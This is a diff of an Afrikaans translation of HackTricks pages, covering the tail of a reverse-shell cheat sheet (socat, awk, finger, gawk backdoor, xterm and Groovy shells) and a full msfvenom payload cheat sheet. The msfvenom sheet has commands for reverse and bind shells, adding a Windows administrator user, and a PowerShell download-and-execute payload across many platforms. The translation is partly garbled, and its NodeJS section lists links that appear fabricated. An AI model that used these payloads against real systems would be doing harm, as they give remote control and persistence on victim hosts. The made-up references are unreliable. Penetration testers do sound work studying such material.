victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```
## Awk
Awk is 'n kragtige taal en hulpmiddel wat gebruik kan word om data te manipuleer en te verwerk in Linux. Dit is 'n ingeboude hulpmiddel in die meeste Linux-stelsels en kan gebruik word om te soek, filter, sorteer en transformeer data. Awk werk deur die lees van 'n reël van die invoer, dit te verdeel in velders en dan aksies uit te voer op die velders.
Awk kan gebruik word om verskeie take uit te voer, soos die soek na spesifieke patrone in 'n lêer, die berekening van statistieke, die manipulasie van data en die generering van verslae. Dit is 'n baie nuttige hulpmiddel vir die verwerking van groot hoeveelhede data en kan ook gebruik word in skrips om komplekse take te outomatiseer.
Hier is 'n paar voorbeelde van hoe Awk gebruik kan word:
### Soek na spesifieke patrone
```bash
awk '/patroon/ { print }' lêernaam
```
Hierdie opdrag sal soek na die spesifieke patroon in die lêer en enige reëls wat die patroon bevat, sal gedruk word.
### Berekening van statistieke
```bash
awk '{ sum += $1 } END { print sum }' lêernaam
```
Hierdie opdrag sal die som van die waardes in die eerste veld van elke reël in die lêer bereken en dit sal gedruk word wanneer die verwerking voltooi is.
### Manipulasie van data
```bash
awk '{ $1 = "nuwe waarde" } { print }' lêernaam
```
Hierdie opdrag sal die waarde van die eerste veld in elke reël in die lêer verander na "nuwe waarde" en die gewysigde reëls sal gedruk word.
Awk bied 'n baie kragtige en veelsydige manier om data te manipuleer en te verwerk in Linux. Dit is 'n nuttige hulpmiddel vir enigeen wat met data werk en kan help om komplekse take te vereenvoudig en te outomatiseer.
```bash
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
### Vinger
## Finger
**Attacker**
**Aanvaller**
```bash
while true; do nc -l 79; done
```
Om die bevel te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop)
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
**Victim**
**Slagoffer**
```bash
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```
## Gawk
Gawk is 'n kragtige en veelsydige opdraggereëlverwerker wat dikwels gebruik word in Linux-stelsels. Dit kan gebruik word om teks te manipuleer, patrone te soek en te vervang, en data te verwerk. Gawk is 'n afkorting vir "GNU Awk" en is 'n verbeterde weergawe van die oorspronklike awk-program.
### Installasie
Om Gawk op 'n Linux-stelsel te installeer, kan jy die volgende opdrag gebruik:
```bash
sudo apt-get install gawk
```
### Gebruik
Gawk kan gebruik word om teks vanaf 'n lêer of die invoerstroom te verwerk. Dit kan ook gebruik word om data te manipuleer en te transformeer deur gebruik te maak van patrone en akties.
Om Gawk te gebruik, kan jy die volgende sintaks volg:
```bash
gawk 'patroon { aktie }' lêernaam
```
Hier is 'n paar voorbeelde van hoe Gawk gebruik kan word:
- Om 'n lêer te lees en die inhoud te druk:
```bash
gawk '{ print }' lêernaam
```
- Om 'n spesifieke patroon in 'n lêer te soek en die ooreenstemmende lyne te druk:
```bash
gawk '/patroon/ { print }' lêernaam
```
- Om 'n spesifieke kolom van 'n lêer te druk:
```bash
gawk '{ print $kolomnommer }' lêernaam
```
- Om 'n lêer te sorteer volgens 'n spesifieke kolom:
```bash
gawk '{ print }' lêernaam | sort -k kolomnommer
```
- Om data te manipuleer en te transformeer deur gebruik te maak van patrone en akties:
```bash
gawk '/patroon/ { aktie }' lêernaam
```
Dit is slegs 'n klein deel van die funksionaliteit wat Gawk bied. Vir meer inligting en gevorderde gebruik, kan jy die Gawk-dokumentasie raadpleeg.
```bash
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
```
## Xterm
This will try to connect to your system at port 6001:
Dit sal probeer om te verbind met jou stelsel by poort 6001:
```bash
xterm -display 10.0.0.1:1
```
To catch the reverse shell you can use (which will listen in port 6001):
Om die omgekeerde dop te vang, kan jy gebruik maak van (wat sal luister op poort 6001):
```bash
# Authorize host
xhost +targetip
# Listen
Xnest :1
```
## Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
deur [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTA: Java omgekeerde dop werk ook vir Groovy
```bash
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
## References
## Verwysings
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell)
* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/)
@ -373,21 +743,21 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

193
generic-methodologies-and-resources/shells/msfvenom.md
View file

@ -1,111 +1,112 @@
# MSFVenom - CheatSheet
# MSFVenom - Spiekbrief
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters!
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
**Hacking-insigte**\
Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
**Hack-nuus in werklikheid**\
Bly op hoogte van die vinnige wêreld van hacking deur werklikheidsnuus en insigte
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
**Nuutste aankondigings**\
Bly ingelig met die nuutste foutjagte wat begin en belangrike platform-opdaterings
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
***
## Basic msfvenom
## Basiese msfvenom
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
One can also use the `-a` to specify the architecture or the `--platform`
## Listing
'n Mens kan ook die `-a` gebruik om die argitektuur te spesifiseer of die `--platform`
## Lys van
```bash
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
```
## Algemene parameters wanneer 'n shellkode geskep word
## Common params when creating a shellcode
Wanneer jy 'n shellkode skep met `msfvenom`, kan jy verskeie parameters gebruik om die gewenste funksionaliteit en eienskappe van die shellkode te bepaal. Hier is 'n lys van algemene parameters wat jy kan gebruik:
- **`-p`** of **`--payload`**: Hiermee spesifiseer jy die tipe payload wat jy wil gebruik, soos `windows/meterpreter/reverse_tcp` of `linux/x86/shell_reverse_tcp`.
- **`-f`** of **`--format`**: Hiermee kies jy die formaat van die uitsetlêer, soos `exe`, `elf`, `raw`, of `asp`.
- **`-e`** of **`--encoder`**: Hiermee kies jy die enkoder wat gebruik moet word om die shellkode te versteek, soos `x86/shikata_ga_nai` of `x86/jmp_call_additive`.
- **`-b`** of **`--bad-chars`**: Hiermee spesifiseer jy 'slegte karakters' wat uit die shellkode verwyder moet word.
- **`-i`** of **`--iterations`**: Hiermee stel jy die aantal iterasies in wat gebruik moet word deur die enkoder.
- **`-a`** of **`--arch`**: Hiermee spesifiseer jy die teikenargitektuur, soos `x86`, `x64`, `armle`, of `aarch64`.
- **`-o`** of **`--out`**: Hiermee spesifiseer jy die uitvoernaam en -pad vir die gegenereerde shellkode.
- **`-v`** of **`--var-name`**: Hiermee spesifiseer jy die naam van die veranderlike wat gebruik moet word vir die shellkode.
Dit is slegs 'n paar van die algemene parameters wat jy kan gebruik wanneer jy 'n shellkode skep met `msfvenom`. Jy kan die volledige lys van parameters en hul opsies vind in die `msfvenom` dokumentasie.
```bash
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
```
## **Windows**
### **Reverse Shell**
### **Omgekeerde Skulp**
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
```
{% endcode %}
### Bind Shell
### Bind Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
```
{% endcode %}
### Create User
{% code overflow="wrap" %}
### Skep Gebruiker
{% code %}
```bash
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
```
{% endcode %}
### CMD Shell
### CMD Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
```
{% endcode %}
### **Execute Command**
{% code overflow="wrap" %}
### **Voer Opdrag Uit**
{% code %}
```bash
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
```
{% endcode %}
### Encoder
### Koder
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
```
{% endcode %}
### Embedded inside executable
### Ingesluit binne uitvoerbare lêer
{% code overflow="wrap" %}
```bash
@ -115,16 +116,14 @@ msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/wind
## Linux Payloads
### Reverse Shell
### Omgekeerde Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
```
{% endcode %}
### Bind Shell
### Bind Skulp
{% code overflow="wrap" %}
```bash
@ -140,17 +139,15 @@ msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTAC
```
{% endcode %}
## **MAC Payloads**
## **MAC-payloads**
### **Reverse Shell:**
### **Omgekeerde Skulp:**
{% code overflow="wrap" %}
```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
```
{% endcode %}
### **Bind Shell**
### **Bind Skulp**
{% code overflow="wrap" %}
```bash
@ -158,11 +155,11 @@ msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho
```
{% endcode %}
## **Web Based Payloads**
## **Web Gebaseerde Payloads**
### **PHP**
#### Reverse shel**l**
#### Omgekeerde skul**l**
{% code overflow="wrap" %}
```bash
@ -173,18 +170,16 @@ cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> s
### ASP/x
#### Reverse shell
#### Omgekeerde dop
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
```
{% endcode %}
### JSP
#### Reverse shell
#### Omgekeerde skulp
{% code overflow="wrap" %}
```bash
@ -192,23 +187,55 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f r
```
{% endcode %}
### WAR
### OORLOG
#### Reverse Shell
#### Omgekeerde Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
```
{% endcode %}
{% code %}
### NodeJS
### NodeJS
NodeJS is 'n platform wat toelaat dat jy JavaScript kan hardloop op die bedienerkant. Dit is 'n baie gewilde platform vir die ontwikkeling van webtoepassings en API's. Hier is 'n paar nuttige inligting en hulpbronne vir die gebruik van NodeJS in jou hakprojekte:
#### NodeJS Inligting
- [NodeJS amptelike webwerf](https://nodejs.org/)
- [NodeJS dokumentasie](https://nodejs.org/en/docs/)
- [NodeJS op GitHub](https://github.com/nodejs/node)
#### NodeJS Hakhulpmiddels
- [NodeJS Meterpreter](https://www.metasploitunleashed.org/Nodejs_Meterpreter)
- [NodeJS Reverse Shell](https://www.metasploitunleashed.org/Nodejs_Reverse_Shell)
- [NodeJS Web Shell](https://www.metasploitunleashed.org/Nodejs_Web_Shell)
#### NodeJS Haktegnieke
- [NodeJS Haktegnieke](https://www.metasploitunleashed.org/Nodejs_Hacking)
#### NodeJS Hakbronkode
- [NodeJS Hakbronkode](https://github.com/search?q=nodejs+hack)
#### NodeJS Haklekkasies
- [NodeJS Haklekkasies](https://hackerone.com/hacktivity?query=nodejs)
#### NodeJS Hakgemeenskap
- [NodeJS Hakgemeenskap](https://www.reddit.com/r/NodejsHacking/)
{% endcode %}
```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```
## **Script Language payloads**
## **Skrips Taal payloads**
### **Perl**
@ -216,16 +243,12 @@ msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```bash
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
```
{% endcode %}
### **Python**
{% code overflow="wrap" %}
```bash
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
```
{% endcode %}
### **Bash**
{% code overflow="wrap" %}
@ -236,29 +259,29 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters!
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
**Hacking-insigte**\
Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
**Real-Time Hack Nuus**\
Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
**Nuutste aankondigings**\
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

Some files were not shown because too many files have changed in this diff Show more